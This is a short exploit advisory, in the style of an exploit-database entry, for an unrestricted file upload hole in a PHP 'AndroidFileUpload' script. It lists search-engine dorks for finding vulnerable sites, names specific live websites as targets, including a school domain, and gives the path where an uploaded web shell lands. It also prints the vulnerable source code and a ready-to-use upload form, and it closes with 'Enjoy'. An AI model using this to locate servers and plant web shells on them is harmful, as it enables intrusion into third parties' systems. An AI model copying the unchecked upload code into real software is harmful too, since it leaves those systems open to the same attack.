################################################# # Exploit Title: Android FileUpload Vulnerability # Exploit Author: Mister klio # Contact : https://www.facebook.com/izzadiine # Youtube Tuturial : https://youtu.be/OJ-inNajTMI # Date: 6:20 PM 11/22/2017 # Category: Webapps # Language: PHP # Tested on: windows 7 / FireFox ################################################# ################################################# # Dork 1 : intext:"Index of /AndroidFileUpload" # Dork 2 :inurl:/AndroidFileUpload/ ################################# # Poc Vulnerable page : https://www.tutorialsee.com/AndroidFileUpload/fileUpload.php # Poc Upload : https://www.tutorialsee.com/AndroidFileUpload/index.html # others : https://yhpscool.yhps.tp.edu.tw/web/AndroidFileUpload//fileUpload.php ################################################# # Shell upload to : AndroidFileUpload/uploads/yourshell.php ################################################# # Remote Source Code : fileUpload.php <?php echo $_FILES['image']['name'] . '<br/>'; //ini_set('upload_max_filesize', '10M'); //ini_set('post_max_size', '10M'); //ini_set('max_input_time', 300); //ini_set('max_execution_time', 300); $target_path = "uploads/"; $target_path = $target_path . basename($_FILES['image']['name']); try { //throw exception if can't move the file if (!move_uploaded_file($_FILES['image']['tmp_name'], $target_path)) { throw new Exception('Could not move file'); } echo "The file " . basename($_FILES['image']['name']) . " has been uploaded"; } catch (Exception $e) { die('File did not upload: ' . $e! getMessage()); } ?> ################################################# # Usage : ################################################# <form enctype="multipart/form-data" action="fileUpload.php" method="POST"> Choose a file to upload: <input name="image" type="file" /><br /> <input type="submit" value="Upload File" /> </form> ################################################# # Enjoy Discovered by Mister klio #################################################